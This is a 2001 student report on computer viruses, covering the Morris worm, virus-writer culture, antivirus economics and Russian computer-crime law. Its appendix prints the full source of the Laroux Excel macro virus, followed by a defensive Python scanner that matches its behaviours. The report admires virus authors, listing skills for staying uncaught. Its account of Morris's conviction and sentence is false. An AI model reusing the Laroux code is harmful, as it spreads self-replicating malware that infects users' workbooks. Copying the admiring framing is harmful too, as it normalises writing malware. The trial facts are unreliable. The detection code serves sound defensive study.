
Computer viruses

                          Chuvash State University

                              Economic faculty



                                   Report

                              COMPUTER VIRUSES



                                                   Author:

                                                   student of EC-13-98

                                                   Eugene Ivanov



                              Cheboxary  2001

                                  CONTENTS


A bit of history

What is a computer virus?

Who writes computer viruses?

To whose advantage are computer viruses written?

A legal notice. Penal Code of Russian Federation

Synopsis

SOURCES

Appendix


                              A bit of history

  On 2 November 1988 Robert Morris Jr., a graduate student of the
informatics faculty of Cornell University (USA), infected a great number of
computers connected to the Internet. This network unites machines of
university centres, private companies and government agencies, including
the National Aeronautics and Space Administration, as well as some military
research centres and labs.
  The network worm struck 6200 machines, which made up 7.3% of the computers
on the network, and showed that UNIX is not safe either. Among those
damaged were NASA, Los Alamos National Lab, a US Navy research centre, the
California Institute of Technology, and the University of Wisconsin (200 of
300 systems). Spreading over the ARPANET, MILNET, Science Internet and
NSFNET networks, it practically put these networks out of action. According
to the "Wall Street Journal", the virus infiltrated networks in Europe and
Australia, where cases of blocked computers were also registered.
  Here are some recollections of participants in the event:
  Symptom: hundreds or thousands of jobs start running  on  a  Unix  system
bringing response to zero.
  Systems attacked: Unix systems, 4.3BSD Unix & variants (e.g.:  SUNs)  any
sendmail compiled with debug has this problem. This virus is spreading  very
quickly over the Milnet.  Within the past 4 hours,  it  has  hit  >10  sites
across the country, both Arpanet and Milnet sites. Well over 50  sites  have
been hit. Most of these are "major" sites and gateways.
  Method: Someone has written a program that uses a hole in  SMTP  Sendmail
utility. This utility can send a message into another program.
  Apparently what the attacker  did  was  this:  he  or  she  connected  to
sendmail (i.e., telnet victim.machine  25),  issued  the  appropriate  debug
command, and had a small C program compiled. (We have it.  Big  deal.)  This
program took as an argument a host number, and copied two programs - one
ending in VAX.OS and the other ending in SunOS - and tried to load and
execute them. In those cases where the load and execution succeeded, the
worm did two things (at least): spawn a lot of shells that did nothing but
clog the process table and burn CPU cycles; look in two places - the
password file and the internet services file - for other sites it could
connect to (this is hearsay, but I don't doubt it for  a  minute).  It  used
both individual .host files (which it found using the  password  file),  and
any other remote hosts it could locate which it had a chance  of  connecting
to. It may have done more; one of  our  machines  had  a  changed  superuser
password, but because of other factors we're not sure this worm did it.
  All of Vaxen and some of Suns here were  infected  with  the  virus.  The
virus forks repeated copies of itself as it tries to spread itself, and  the
load averages on the infected machines skyrocketed. In fact, it got  to  the
point that some of the machines ran out  of  swap  space  and  kernel  table
entries, preventing login to even see what was going on!
  The virus also "cleans" up  after  itself.  If  you  reboot  an  infected
machine (or it crashes), the  /tmp  directory  is  normally  cleaned  up  on
reboot. The other incriminating files were  already  deleted  by  the  virus
itself.
  On 4 November the author of the virus - Morris - came to FBI headquarters
in Washington of his own accord. The FBI imposed a ban on all material
relating to the Morris virus.
  On 22 January 1989 a jury found Morris guilty. If the guilty verdict had
been approved without modification, Morris would have been sentenced to 5
years in prison and a fine of 250 000 dollars. However, Morris' attorney
Thomas Guidoboni immediately lodged a protest and sent all the papers to
the Circuit Court with a petition to overturn the court's decision... In
the end Morris was sentenced to 3 months in prison and a fine of 270
thousand dollars; in addition, Cornell University suffered a heavy loss,
having expelled Morris from its ranks. The author then had to take part in
the liquidation of his own creation.

                          What is a computer virus?

  It is executable code that is able to reproduce itself. Viruses are an
area of pure programming and, unlike other computer programs, carry
intelligent functions that protect them from being found and destroyed.
They have to fight for survival in the complex conditions of conflicting
computer systems. That's why they evolve as if they were alive.
  Yes, viruses seem to be the only living organisms in the computer
environment, and their main goal is survival. That is why they may have
complex encryption/decryption engines, which are indeed something of a
standard for computer viruses nowadays, in order to carry out the processes
of duplication, adaptation and disguise.
  It is necessary to differentiate between reproducing programs and Trojan
horses. Reproducing programs will not necessarily harm your system, because
they are aimed at producing as many copies (or near-copies) of themselves
as possible, either by means of so-called agent programs or without their
help. In the latter case they are referred to as "worms".
  Meanwhile, Trojan horses are programs aimed at causing harm or damage to
PCs. Certainly it is a usual practice for them to be part of a
"tech-organism", but they have completely different functions.
  That is an important point. Destructive actions are not an integral part
of a virus by default. However, virus writers allow the presence of
destructive mechanisms as an active protection against their creations
being found and destroyed, as well as a response to the attitude of society
to viruses and their authors.
  As you see, there are different types of viruses, and they have already
been separated into classes and categories, for instance: harmless,
dangerous, and very dangerous. No destruction means a harmless virus,
tricks with system halts mean a dangerous one, and devastating destruction
means a very dangerous virus.
  But viruses are famous not only for their destructive actions, but also
for their special effects, which are almost impossible to classify. Some
virus writers suggest the following: funny, very funny, and sad or
melancholy (keeps silent and infects). But one should remember that special
effects must occur only after a certain number of infections. Users should
also be given a chance to restrict the execution of destructive actions,
such as deleting files or formatting hard disks. In this way a virus can be
considered a useful program that keeps a check on system changes and
prevents surprises such as the deletion of files or the wiping of hard
disks.
  It sounds quite heretical to say such words about viruses, which are
usually considered a disaster. The less a person understands about
programming and virology, the more the possibility of being infected with a
virus will affect him. Thus, let us consider the creators of viruses as the
best source.

                        Who writes computer viruses?

  They are lone wolves or groups of programmers.
  In spite of the fact that a lot of people think that writing a computer
virus is hard, it is not exactly so. Using special programs called "virus
creators", even beginners in the computer world can build their own
viruses, which will be a strain of a certain major virus. This is precisely
the case with the notorious "Anna Kournikova" virus, which is actually a
worm. The aim of creating viruses in this way is pretty obvious: the author
wants to become well known all over the world and to show his powers.
  However, the results of the attempt can be very sad (see "A bit of
history"); only real professionals can become famous and stay uncaught. A
good example is Dark Avenger. Yes, and it is yet another custom of
participants of "the scene" to take terrifying monikers (nicknames).
  To write something really new and remarkable, a programmer should have
some extra knowledge and skills, for example:
  1) good strategic thinking and intuition - once released, a virus and its
     descendants live their own independent life in nearly unpredictable
     conditions. Therefore the author must anticipate a lot of things;
  2) splendid knowledge of Assembler language[1] and the operating system
     he writes for - the more mistakes there are in the virus, the quicker
     it will be caught;
  3) attention to detail and the skill to solve the most varied tactical
     questions - one won't write a compact, satisfactorily working program
     without these abilities;
  4) high professional discipline in order to join the preceding points
     together.
  A computer virus group is an informal non-profit organisation uniting
programmers - authors of viruses - regardless of their qualifications.
Anyone can become a member of the club if he creates viruses or studies
them for the purpose of creation and spreading.
  The aims they pursue together may differ from those of a single virus
writer, although they usually also try to become as famous as possible. But
at the same time they may help beginning programmers in the field of
viruses and spread commented virus sources and descriptions of virus
algorithms.
  One can't say that all of the group members write viruses in Assembler.
Actually, you don't have to know any computer language or write any program
code to become a member or a friend of the group. But programming in
Assembler is preferred; Pascal, C++ and other high-level languages are
considered humiliating. It does make sense, since programs written in
Assembler are much smaller (0.5-5 kb) and therefore more robust. On the
other hand, Assembler is quite difficult to understand, especially for
beginners. One has to think the way the computer does: all commands are
sent directly to the central processing unit of the PC.
  There are computer virus groups all over the world, a few being more
successful than others. It may be pretty hard to get in contact with them,
since they are quite typical representatives of the computer underground
world, as are (free)wares groups. Sometimes, however, creating viruses can
become a respectable occupation bringing a constant income. After all, no
one but the author of a virus can provide valuable information on the way
it should be treated and cured.


              To whose advantage are computer viruses written?

  Copyleft (cl) is distribution of programs without registering the
software, i.e. using a cracked copy. The practice is widely used in the
territory of the former USSR, even by medium and big companies, to say
nothing of ordinary users. This software is stolen, which entails criminal
responsibility (see the legal notice). One of the general values of our
culture is generosity, and you can't do anything about it. But freeware
lovers should at least know that continuing the practice could be risky.
That is the first use of computer viruses - as a sort of compensation to
software developers.
  In the very same way, writing viruses usually does not bring profit to
the author, at least when the authors of a virus and of its cure are
different persons. The situation is quite different when they are the same
person, especially if that person manages to hide the double-dealing. And
that is the second advantage of computer viruses.
  Yes, developers of antivirus software make money from selling their
remedy for a new virus widely hyped by the mass media. The agitation can
grow so strong that all and sundry dash to buy antivirus protection against
even the most harmless virus. The ordinary behaviour of share indexes on
stock exchanges during a computer virus epidemic is to fall. However, the
shares of such companies as Symantec (which is famous for its Norton
Antivirus) will soar sky-high.
  The tendency is especially significant in the world of the emerging New
Economy. This fancy term means an economy based on computer services as the
engine of development. The system exists in the United States. That is why
we hardly ever hear the names of Dow Jones and Standard & Poor's in the
mass media nowadays. Their place is occupied by the NASDAQ Composite index,
based on the National Association of Securities Dealers Automated
Quotations system. The index reflects the performance of high-tech
companies, the base of the New Economy.
  We can't say for sure, but maybe in the near future the index will be
influenced more by computers themselves than by brokers and dealers on the
world's stock exchanges. IBM Corporation has recently presented its new
invention - an automated broker, which is in fact a mainframe (a very big
computer) with specialised software. It is a descendant of the Deep Blue
mainframe, well known for its skill at chess. Unfortunately, it seems that
bad times have come for the whole economy of the USA, which also means
problems for NASDAQ.
  Nevertheless, the initiative of IBM should certainly be welcomed.
Automated brokers seem to understand the volatility of indexes much more
quickly and rationally than human beings. There is only one drawback to
eliminate - the problem of artificial intelligence. A machine can't think
as a human does.
  Maybe computer viruses could be of some use here too. After all, the
flights to the Moon became a simple consequence of inventing new ways of
exterminating the civilian population during the Second World War
(ballistic rockets). A wish to kill people made a fantastic daydream become
reality within fifty years. The first computing machine was actively used
during the development of the first atomic bomb. So sometimes even very bad
things, much more dangerous than viruses (name at least one person who has
been the victim of a cruel computer virus), can greatly assist progress and
bring a greater profit.


              A legal notice. Penal Code of Russian Federation


          Chapter 28. Crimes in the sphere of computer information



    Article 272. Illegitimate access to computer information


  1. Illegitimate access to law-protected computer information, i.e.
information on a machine carrier, in an electronic computing machine (PC),
PC system or its network, if it causes the destruction, blocking,
modification or copying of information, or disruption of the work of the
PC, PC system or its network, -
  is punished by a fine in the amount of two to five hundred minimum wages,
or in the amount of the salary or other income of the convicted person for
a period of two to five months, or by corrective labour for a period of six
months to one year, or by deprivation of liberty for a term of up to two
years.
  2. The same deed, committed by a group of persons by prior conspiracy, or
by an organised group, or by a person using their official position, as
well as having access to the PC, PC system or its network, -
  is punished by a fine in the amount of five to eight hundred minimum
wages, or in the amount of the salary or other income of the convicted
person for a period of five to eight months, or by corrective labour for a
period of one to two years, or by arrest for a period of three to six
months, or by deprivation of liberty for a term of up to two years.


    Article 273. Creation, use and spreading of harmful programs for PC

  1. Creating programs for PC or making changes to existing programs that
knowingly lead to unauthorised deletion, blocking, modification or copying
of information, or disruption of the work of the PC, PC system or its
network, as well as the use or spreading of such programs or of machine
carriers with such programs, -
  is punished by deprivation of liberty for a term of up to three years
with a fine in the amount of two to five hundred minimum wages, or in the
amount of the salary or other income of the convicted person for a period
of two to five months.
  2. The same deeds, having caused grave consequences through negligence, -
  are punished by deprivation of liberty for a term of three to seven
years.


                                  Synopsis

  The history of computer viruses began recently, but it has already become
legendary. Almost everyone knows a few awesome fables about these
creatures, but hardly anyone understands what a computer virus is.
  A computer virus is executable code that is able to reproduce itself.
Viruses are an area of pure programming and, unlike other computer
programs, carry intelligent functions that protect them from being found
and destroyed. They have to fight for survival in the complex conditions of
conflicting computer systems.
  Viruses seem to be the only living organisms in the computer environment,
and their main goal is survival. That is why they may have complex
encryption/decryption engines, which are indeed something of a standard for
computer viruses nowadays, in order to carry out the processes of
duplication, adaptation and disguise.
  Viruses are written by lone wolves or groups of programmers.
  Using special programs called "virus creators", even beginners in the
computer world can build their own viruses. The aim of creating viruses in
this way is pretty obvious: the author wants to become well known all over
the world and to show his powers.
  The results of the attempt can be very sad; only real professionals can
become famous and stay uncaught. To write something really new and
remarkable, a programmer should have some extra knowledge and skills.
  A computer virus group is an informal non-profit organisation uniting
programmers - authors of viruses - regardless of their qualifications.
Anyone can become a member of the club if he creates viruses or studies
them for the purpose of creation and spreading. You don't have to know any
computer language or write any program code to become a member or a friend
of the group. Programming in Assembler is preferred; Pascal, C++ and other
high-level languages are considered humiliating.
  There are computer virus groups all over the world, a few being more
successful than others. It may be pretty hard to get in contact with them,
since they are quite typical representatives of the computer underground
world, as are (free)wares groups. Sometimes, however, creating viruses can
become a respectable occupation bringing a constant income. After all, no
one but the author of a virus can provide valuable information on the way
it should be treated and cured.
  Developers of antivirus software make money from selling their remedy for
a new virus widely hyped by the mass media. The agitation can grow so
strong that all and sundry dash to buy antivirus protection against even
the most harmless virus. The ordinary behaviour of share indexes on stock
exchanges during a computer virus epidemic is to fall. However, the shares
of high-tech companies producing antivirus software will soar sky-high.
  An epidemic of foot-and-mouth disease has overwhelmed Europe in these
days (March 15, 2001). It seems that a vast economic crisis is breaking out
in America. World finance is doing its best to escape the worst.
  A breakthrough in the development of artificial intelligence could
prevent NASDAQ from collapsing completely. Help may come from an unexpected
side...
  But don't forget that the creation, use and spreading of harmful programs
for PC is a criminal offence, as is using cracked versions of programs. Our
penal code establishes a punishment of up to seven years in jail.
  And be aware that computer viruses have come to stay for a long time, if
not forever.


                                   SOURCES


1. Penal Code of Russian Federation
2. Handless N.N. Computer virology. Part 1: General principles of
   operation, categorization and catalogue of the most widespread viruses in
   operating system MS DOS. - Kiev, 1990.
3. Infected Voice. Issue 1, September, 1994. - STEALTH group.
4. Infected Voice. Issue 2, October, 1994. - STEALTH group.
5. Infected Voice. Issue 3, December, 1994. - STEALTH group.


                                  Appendix


    A fragment of a macro virus (Laroux), written in a high-level computer
                        language (Excel Visual Basic)

Attribute VB_Name = "laroux"

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "PERSONAL.XLS")
    If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10

Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    Sheets("laroux").Visible = True
    Sheets("laroux").Select
    Sheets("laroux").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" &
"PERSONAL.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("laroux").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "personal.xls!check_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
    If s$ <> "laroux" Then
        Workbooks("PERSONAL.XLS").Sheets("laroux").Copy
before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("laroux").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "personal.xls!check_files"
    Case Else
End Select
End Sub
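
  A defender's reading of the fragment above, as an added example that is
not part of the original report: a Python scanner that looks through
exported macro text for the behaviours the fragment shows (an auto_open
trigger that hooks sheet activation, a save into the Excel startup folder,
a sheet copied into other workbooks, a hidden sheet). The behaviour names,
the verdict thresholds and both sample strings are assumptions of this
example.

```python
import re

# Behaviours visible in the Laroux fragment above. A behaviour counts as
# present only if ALL of its patterns occur in the macro source.
BEHAVIOURS = {
    "trigger": [        # runs when the workbook opens, then hooks sheet activation
        r"^\s*Sub\s+auto_open\s*\(",
        r'Application\.OnSheetActivate\s*=\s*"[^"]+"',
    ],
    "persistence": [    # saves a workbook into the Excel startup folder
        r"\.SaveAs\b",
        r"Application\.StartupPath",
        r"PERSONAL\.XLS",
    ],
    "propagation": [    # copies a sheet into the workbook being activated
        r"Sheets\([^)]*\)\.Copy\s+before\s*:=\s*Workbooks\(",
    ],
    "concealment": [    # hides the carrier sheet from the user
        r"Sheets\([^)]*\)\.Visible\s*=\s*False",
    ],
}
CORE = {"trigger", "persistence", "propagation"}  # assumed threshold for a match

def normalise(source):
    """Join VBA line continuations (' _' at end of line) and drop comment lines."""
    joined = re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", source)
    return "\n".join(
        line for line in joined.splitlines()
        # whole-line comments only; trailing comments are not handled here
        if not line.lstrip().lower().startswith(("'", "rem "))
    )

def scan_macro(source):
    """Return a verdict and the list of behaviours found in exported macro text."""
    text = normalise(source)
    found = sorted(
        name for name, patterns in BEHAVIOURS.items()
        if all(re.search(p, text, re.I | re.M) for p in patterns)
    )
    if CORE.issubset(found):
        verdict = "laroux-like"
    elif len(found) >= 2:
        verdict = "suspicious"
    else:
        verdict = "no match"
    return {"verdict": verdict, "behaviours": found}

# Constructed sample: a few lines excerpted from the appendix, not a full macro.
EXCERPT = r'''
Sub auto_open()
    Application.OnSheetActivate = "check_files"
End Sub
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & _
        "PERSONAL.XLS", FileFormat:=xlNormal
    Workbooks("PERSONAL.XLS").Sheets("laroux").Copy _
        before:=Workbooks(n4$).Sheets(1)
    Workbooks(n4$).Sheets("laroux").Visible = False
'''

# Constructed benign macro: has auto_open and SaveAs but none of the behaviours.
BENIGN = r'''
Sub auto_open()
    ' Application.OnSheetActivate = "refresh"
    Sheets("Report").Range("A1").Value = "Monthly totals"
    ActiveWorkbook.SaveAs FileName:="report.xls"
End Sub
'''

if __name__ == "__main__":
    print(scan_macro(EXCERPT), scan_macro(BENIGN))
```

  Requiring several behaviours together, rather than a single keyword such
as auto_open or SaveAs, is what keeps the ordinary macro in BENIGN from
being flagged.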
-----------------------
[1] Assembler - a low-level, hardware-oriented computer language